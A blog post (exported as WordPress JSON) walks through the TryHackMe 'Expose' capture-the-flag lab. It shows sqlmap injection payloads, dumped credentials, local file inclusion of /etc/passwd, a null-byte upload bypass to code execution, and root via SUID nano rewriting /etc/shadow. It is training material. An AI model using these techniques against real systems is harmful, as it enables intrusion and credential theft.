{"id":227,"date":"2025-07-01T09:27:24","date_gmt":"2025-07-01T09:27:24","guid":{"rendered":"https:\/\/hackingwithj.com\/?p=227"},"modified":"2025-07-09T18:02:07","modified_gmt":"2025-07-09T18:02:07","slug":"ctf-expose","status":"publish","type":"post","link":"https:\/\/hackingwithj.com\/?p=227","title":{"rendered":"CTF: Expose"},"content":{"rendered":"\n

Today I tackled the Expose<\/em> challenge on TryHackMe. As part of improving my pentesting workflow, I\u2019m trying to write these posts in a more formal, report-style format \u2014 blending hands-on testing with structured documentation.<\/p>\n\n\n\n

Reconnaissance<\/h1>\n\n\n\n

I started with a simple nmap scan:<\/p>\n\n\n\n

\u250c\u2500\u2500(kali\u327fkali)-[~\/Downloads\/ctf\/expose]\n\u2514\u2500$ nmap -sV -T4 -A -p- -Pn 10.10.245.228\nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-07-01 01:04 EDT\nNmap scan report for 10.10.245.228\nHost is up (0.029s latency).\nNot shown: 65530 closed tcp ports (reset)\nPORT     STATE SERVICE                 VERSION\n21\/tcp   open  ftp                     vsftpd 2.0.8 or later                                                                                                        \n22\/tcp   open  ssh                     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)                     \n53\/tcp   open  domain                  ISC BIND 9.16.1 (Ubuntu Linux)\n1337\/tcp open  http                    Apache httpd 2.4.41 ((Ubuntu))\n1883\/tcp open  mosquitto version 1.6.9\nDevice type: general purpose\nRunning: Linux 4.X\nOS CPE: cpe:\/o:linux:linux_kernel:4.15\nOS details: Linux 4.15\nNetwork Distance: 2 hops\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE (using port 8888\/tcp)\nHOP RTT      ADDRESS\n1   27.67 ms 10.21.0.1\n2   28.99 ms 10.10.245.228<\/code><\/pre>\n\n\n\n
The target runs several interesting services. I decided to explore them one by one.<\/p>\n\n\n\n
\ud83d\udd10 FTP (Port 21)<\/h2>\n\n\n\n
Anonymous login was enabled, but no files were listed. Interestingly, the PUT<\/code> command was allowed \u2014 possibly useful later for file uploads.<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/Downloads\/ctf\/expose]\n\u2514\u2500$ ftp expose.thm\nConnected to expose.thm.\n220 Welcome to the Expose Web Challenge.\nName (expose.thm:kali): anonymous\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> dir\n229 Entering Extended Passive Mode (|||6368|)\n150 Here comes the directory listing.\n226 Directory send OK.\nftp> ls\n229 Entering Extended Passive Mode (|||30755|)\n150 Here comes the directory listing.\n226 Directory send OK.<\/code><\/pre>\n\n\n\n
\ud83d\udce1 MQTT (Port 1883)<\/h2>\n\n\n\n
This was new territory for me \u2014 I\u2019ve got MQTT devices at home, but never tested them offensively. From HackTricks:<\/p>\n\n\n\n
\n
Authentication is totally optional and even if authentication is being performed, encryption is not used by default (credentials are sent in clear text). MITM attacks can still be executed to steal passwords.<\/p>\n<\/blockquote>\n\n\n\n
I used python-mqtt-client-shell<\/code><\/a> to connect:<\/p>\n\n\n\n
> host 10.10.245.228
> connect
> subscribe \"#\" 1
> subscribe \"$SYS\/#\"<\/code><\/pre>\n\n\n\n
Shortly after, messages started appearing, including:<\/p>\n\n\n\n
Topic: $SYS\/broker\/version
Payload: mosquitto version 1.6.9<\/code><\/pre>\n\n\n\n
Nothing sensitive was leaked, but it confirmed the service was unauthenticated and readable.<\/p>\n\n\n\n
\"\"
Wireshark<\/em><\/figcaption><\/figure>\n\n\n\n
\ud83e\udde0 Note to self:<\/strong> Learn more about exploiting MQTT topics for lateral movement or code execution.<\/p>\n\n\n\n
\ud83c\udf10 HTTP (Port 1337)<\/h2>\n\n\n\n
The homepage only displayed the word EXPOSED<\/code>. The HTML source gave no real hints, so I launched a directory brute-force with dirb<\/code>:<\/p>\n\n\n\n
Interesting paths:<\/strong><\/p>\n\n\n\n
    \n
  • \/admin<\/code> \u2192 fake login page<\/li>\n\n\n\n
  • \/javascript<\/code> \u2192 403 Forbidden<\/li>\n\n\n\n
  • \/phpmyadmin<\/code> \u2192 accessible but unauthenticated<\/li>\n\n\n\n
  • \/admin_101<\/code> \u2192 contains a working login form<\/li>\n<\/ul>\n\n\n\n
    SQL Injection on \/admin_101<\/code><\/h3>\n\n\n\n
    The login form at \/admin_101<\/code> looked suspicious. The username field was pre-filled \u2014 possible hint. I inspected the HTML source and captured the request with Burp Suite<\/strong>.<\/p>\n\n\n\n
    \"\"
    source-code<\/em><\/figcaption><\/figure>\n\n\n\n
    \"\"
    Burp request<\/em><\/figcaption><\/figure>\n\n\n\n
    After saving the POST request, I tested it with sqlmap<\/code>:<\/p>\n\n\n\n
    \u250c\u2500\u2500(kali\u327fkali)-[~\/Downloads\/ctf\/expose]\n\u2514\u2500$ sqlmap -r post_login.txt -p email\n\n[01:51:02] [INFO] testing 'MySQL UNION query (54) - 81 to 100 columns'\nPOST parameter 'email' is vulnerable. Do you want to keep testing the others (if any)? [y\/N] n\nsqlmap identified the following injection point(s) with a total of 700 HTTP(s) requests:\n---\nParameter: email (POST)\n    Type: boolean-based blind\n    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)\n    Payload: email=dfdfg' AND EXTRACTVALUE(9828,CASE WHEN (9828=9828) THEN 9828 ELSE 0x3A END)-- qyuE&password=dfgdfg\n\n    Type: error-based\n    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)\n    Payload: email=dfdfg' AND GTID_SUBSET(CONCAT(0x7178717071,(SELECT (ELT(8703=8703,1))),0x7176766a71),8703)-- KQad&password=dfgdfg\n\n    Type: time-based blind\n    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n    Payload: email=dfdfg' AND (SELECT 6283 FROM (SELECT(SLEEP(5)))kYqY)-- VrAj&password=dfgdfg\n---\n[01:51:07] [INFO] the back-end DBMS is MySQL\nweb server operating system: Linux Ubuntu 20.04 or 20.10 or 19.10 (focal or eoan)\nweb application technology: Apache 2.4.41\nback-end DBMS: MySQL >= 5.6<\/code><\/pre>\n\n\n\n
    Dumping the database:<\/p>\n\n\n\n
    Database: expose\nTable: config\n[2 entries]\n+----+------------------------------+-----------------------------------------------------+\n| id | url                          | password                                            |\n+----+------------------------------+-----------------------------------------------------+\n| 1  | \/file1010111\/index.php       | 69c66901194a6486176e81f5945b8929                    |\n| 3  | \/upload-cv00101011\/index.php | \/\/ ONLY ACCESSIBLE THROUGH USERNAME STARTING WITH Z |\n+----+------------------------------+-----------------------------------------------------+\n\n[01:55:51] [INFO] table 'expose.config' dumped to CSV file '\/home\/kali\/.local\/share\/sqlmap\/output\/expose.thm\/dump\/expose\/config.csv'\n[01:55:51] [INFO] fetching columns for table 'user' in database 'expose'\n[01:55:51] [INFO] retrieved: 'id'\n[01:55:51] [INFO] retrieved: 'int'\n[01:55:51] [INFO] retrieved: 'email'\n[01:55:51] [INFO] retrieved: 'varchar(512)'\n[01:55:51] [INFO] retrieved: 'password'\n[01:55:52] [INFO] retrieved: 'varchar(512)'\n[01:55:52] [INFO] retrieved: 'created'\n[01:55:52] [INFO] retrieved: 'timestamp'\n[01:55:52] [INFO] fetching entries for table 'user' in database 'expose'\n[01:55:52] [INFO] retrieved: '2023-02-21 09:05:46'\n[01:55:52] [INFO] retrieved: 'hacker@root.thm'\n[01:55:52] [INFO] retrieved: '1'\n[01:55:52] [INFO] retrieved: 'VeryDifficultPassword!!#@#@!#!@#1231'\nDatabase: expose\nTable: user\n[1 entry]\n+----+-----------------+---------------------+--------------------------------------+\n| id | email           | created             | password                             |\n+----+-----------------+---------------------+--------------------------------------+\n| 1  | hacker@root.thm | 2023-02-21 09:05:46 | VeryDifficultPassword!!#@#@!#!@#1231 |\n+----+-----------------+---------------------+--------------------------------------+<\/code><\/pre>\n\n\n\n
    \ud83d\udd13 Getting Access<\/h1>\n\n\n\n
    With credentials and two hidden pages from the earlier SQL injection, it’s time to move toward initial access. Here’s what we know:<\/p>\n\n\n\n
    Credentials found:<\/strong><\/p>\n\n\n\n
    hacker@root.thm : VeryDifficultPassword!!#@#@!#!@#1231<\/code><\/pre>\n\n\n\n
    Discovered hidden paths:<\/strong><\/p>\n\n\n\n
    \/file1010111\/index.php
    \/upload-cv00101011\/index.php<\/code><\/pre>\n\n\n\n
    We also extracted a password hash which couldn\u2019t be cracked using default rockyou.txt<\/code> in Hashcat. However, CrackStation succeeded, revealing:<\/p>\n\n\n\n
    easytohack<\/code><\/pre>\n\n\n\n
    Page analysis: \/file1010111\/index.php<\/code><\/h2>\n\n\n\n
    After logging into this page, it returned a blank screen. A quick look at the source code gave a subtle hint that file handling might be going on in the background:<\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    Changing the request method to GET<\/code> in Burp Suite didn\u2019t yield results. But appending a query parameter manually revealed more:<\/p>\n\n\n\n
    \/file1010111\/index.php?file=<\/code><\/pre>\n\n\n\n
    Testing for Local File Inclusion (LFI) worked. Using path traversal, I managed to access \/etc\/passwd<\/code> and filtered out users without shells. That revealed:<\/p>\n\n\n\n
    root:x:0:0:root:\/root:\/bin\/bash\nubuntu:x:1000:1000:Ubuntu:\/home\/ubuntu:\/bin\/bash\nzeamkish:x:1001:1001:Zeam Kish,1,1,:\/home\/zeamkish:\/bin\/bash<\/code><\/pre>\n\n\n\n
    We now know the valid user: zeamkish<\/strong><\/p>\n\n\n\n
    Page analysis: \/upload-cv00101011\/index.php<\/code><\/h2>\n\n\n\n
    This page prompts for a username. Using zeamkish<\/code>, we were granted access and presented with a file upload form.<\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    The form only accepts .png<\/code> files. After uploading a test image, a message instructed me to check this path: \/upload-cv00101011\/upload_thm_1001\/<\/code> Visiting http:\/\/expose.thm:1337\/upload-cv00101011\/upload_thm_1001\/ showed the uploaded file successfully\u2014indicating we had write access.<\/p>\n\n\n\n
    Checking the source code of the upload page, I found client-side validation:<\/p>\n\n\n\n
    <script>\nfunction validate(){\n\n var fileInput = document.getElementById('file');\n  var file = fileInput.files[0];\n  \n  if (file) {\n    var fileName = file.name;\n    var fileExtension = fileName.split('.').pop().toLowerCase();\n    \n    if (fileExtension === 'jpg' || fileExtension === 'png') {\n      \/\/ Valid file extension, proceed with file upload\n      \/\/ You can submit the form or perform further processing here\n      console.log('File uploaded successfully');\n\t  return true;\n    } else {\n      \/\/ Invalid file extension, display an error message or take appropriate action\n      console.log('Only JPG and PNG files are allowed');\n\t  return false;\n    }\n  }\n}\n<\/script><\/code><\/pre>\n\n\n\n
    A simple rename like shell.php.png<\/code> was blocked.<\/p>\n\n\n\n
    In Burp, I intercepted the upload request and modified the filename to include a null byte (%00<\/code>) before the extension. That bypassed the check:<\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    The server saved it as a .php<\/code> file and executed it \u2014 confirming Remote Code Execution (RCE).<\/p>\n\n\n\n
    Privilege Escalation<\/h1>\n\n\n\n
    After stabilzing my shell I started looking arround and found:<\/p>\n\n\n\n
    www-data@ip-10-10-242-59:\/$ ls -la \/home\ntotal 16\ndrwxr-xr-x  4 root     root     4096 Jun 30  2023 .\ndrwxr-xr-x 20 root     root     4096 Jul  1 07:03 ..\ndrwxr-xr-x  8 ubuntu   ubuntu   4096 Jul  6  2023 ubuntu\ndrwxr-xr-x  3 zeamkish zeamkish 4096 Jul  6  2023 zeamkish\nwww-data@ip-10-10-242-59:\/$ ls -la \/home\/zeamkish\/\ntotal 36\ndrwxr-xr-x 3 zeamkish zeamkish 4096 Jul  6  2023 .\ndrwxr-xr-x 4 root     root     4096 Jun 30  2023 ..\n-rw-rw-r-- 1 zeamkish zeamkish    5 Jul  6  2023 .bash_history\n-rw-r--r-- 1 zeamkish zeamkish  220 Jun  8  2023 .bash_logout\n-rw-r--r-- 1 zeamkish zeamkish 3771 Jun  8  2023 .bashrc\ndrwx------ 2 zeamkish zeamkish 4096 Jun  8  2023 .cache\n-rw-r--r-- 1 zeamkish zeamkish  807 Jun  8  2023 .profile\n-rw-r----- 1 zeamkish zeamkish   27 Jun  8  2023 flag.txt\n-rw-rw-r-- 1 root     zeamkish   34 Jun 11  2023 ssh_creds.txt\nwww-data@ip-10-10-242-59:\/$ cat \/home\/zeamkish\/ssh_creds.txt \nSSH CREDS\nzeamkish\neasytohack@123<\/code><\/pre>\n\n\n\n
    Using zeamkish:easytohack@123<\/code>, I opened a full SSH session. In the home folder, the user flag was also waiting in flag.txt<\/code>.<\/p>\n\n\n\n
    Linpeas<\/h2>\n\n\n\n
    To speed things up, I always run LinPEAS<\/strong> for local privilege escalation enumeration. Some of the more interesting findings:<\/p>\n\n\n\n
      \n
    • Ports<\/strong> on localhost:\n
        \n
      • 1111<\/li>\n\n\n\n
      • 953<\/li>\n\n\n\n
      • 1883<\/li>\n\n\n\n
      • 33060<\/li>\n\n\n\n
      • 3306<\/li>\n<\/ul>\n<\/li>\n\n\n\n
      • Uncommon <\/strong>SUID Binaries\n
          \n
        • rwsr-x— 1 root zeamkish 313K Feb 18 2020 \/usr\/bin\/find<\/li>\n\n\n\n
        • rwsr-xr-x 1 root root 313K Apr 10 2020 \/usr\/bin\/nano<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n
          Analysis<\/strong><\/p>\n\n\n\n
          At first, I thought the nano<\/code> SUID might be limited in use, but it actually gave me enough permissions to access sensitive files as root.<\/p>\n\n\n\n
          \"\"
          Screenshot from my notes<\/em><\/figcaption><\/figure>\n\n\n\n
          but only because nano<\/code> ran as root, not because I became<\/em> root. So technically, I wasn\u2019t root yet.<\/p>\n\n\n\n
          Getting Root<\/h2>\n\n\n\n
          Since nano<\/code> is SUID root and can edit anything, I realized I could modify \/etc\/passwd<\/code> and \/etc\/shadow<\/code>. Time to add a real root-level user.<\/p>\n\n\n\n
          First, I generated a password hash using OpenSSL:<\/p>\n\n\n\n
          zeamkish@ip-10-10-242-59:\/home\/ubuntu$ openssl passwd -1 -salt CTF_Saltje \"mijnr00twachtwoord!\"\n$1$CTF_Salt$CJUxj1WEXkjUz\/J5sbHvt0<\/code><\/pre>\n\n\n\n
          I appended the following line using nano:<\/p>\n\n\n\n
          newroot:x:0:0:New Root:\/root:\/bin\/bash<\/code><\/pre>\n\n\n\n
          And then updated \/etc\/shadow<\/code> with:<\/p>\n\n\n\n
          newroot:$1$CTF_Salt$CJUxj1WEXkjUz\/J5sbHvt0:0:0:99999:7:::<\/code><\/pre>\n\n\n\n
          Yes, nano<\/code> was able to write both files due to the SUID bit. For some reason, the new user didn\u2019t work. Either login was blocked, or something went wrong with the shadow file. Still using nano<\/code> as root, I opened \/etc\/shadow<\/code> again and replaced the hash for the existing root<\/code> user with my custom hash. That worked<\/p>\n\n\n\n
          \ud83d\udcd8 Lessons Learned<\/h2>\n\n\n\n
          This box had some cool gotchas that made it more interesting than expected. Here’s what I took away:<\/p>\n\n\n\n
          What Went Well<\/h3>\n\n\n\n
            \n
          • Enumeration discipline paid off<\/strong>: LinPEAS gave me everything I needed. The SUID nano<\/code> was subtle but powerful.<\/li>\n\n\n\n
          • Recognizing false positives<\/strong>: Just because you can read \/root\/root.txt<\/code> doesn\u2019t mean you\u2019re root. That moment of \u201cwait\u2026 am I really root?\u201d helped me pause and rethink.<\/li>\n\n\n\n
          • Plan B thinking<\/strong>: When adding a user failed, falling back to modifying the root<\/code> hash directly saved the day.<\/li>\n\n\n\n
          • Null byte upload bypass<\/strong><\/li>\n<\/ul>\n\n\n\n
            What I\u2019d Do Differently<\/h3>\n\n\n\n
              \n
            • Verify user creation more closely<\/strong>: I should\u2019ve double-checked PAM or SSH login behavior before assuming the new user was usable.<\/li>\n\n\n\n
            • Dig into shadow file structure<\/strong>: A deeper understanding of how fields in \/etc\/shadow<\/code> work would\u2019ve helped debug the login issue faster.<\/li>\n<\/ul>\n\n\n\n
              <\/p>\n","protected":false},"excerpt":{"rendered":"
              Today I tackled the Expose challenge on TryHackMe. As part of improving my pentesting workflow, I\u2019m trying to write these posts in a more formal, report-style format \u2014 blending hands-on testing with structured documentation. Reconnaissance I started with a simple nmap scan: The target runs several interesting services. I decided to explore them one by […]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"site-container-style":"default","site-container-layout":"default","site-sidebar-layout":"default","disable-article-header":"default","disable-site-header":"default","disable-site-footer":"default","disable-content-area-spacing":"default","footnotes":""},"categories":[8],"tags":[18],"class_list":["post-227","post","type-post","status-publish","format-standard","hentry","category-ctf","tag-sqlmap"],"_links":{"self":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts\/227","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=227"}],"version-history":[{"count":21,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts\/227\/revisions"}],"predecessor-version":[{"id":257,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts\/227\/revisions\/257"}],"wp:attachment":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=227"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=227"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=227"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}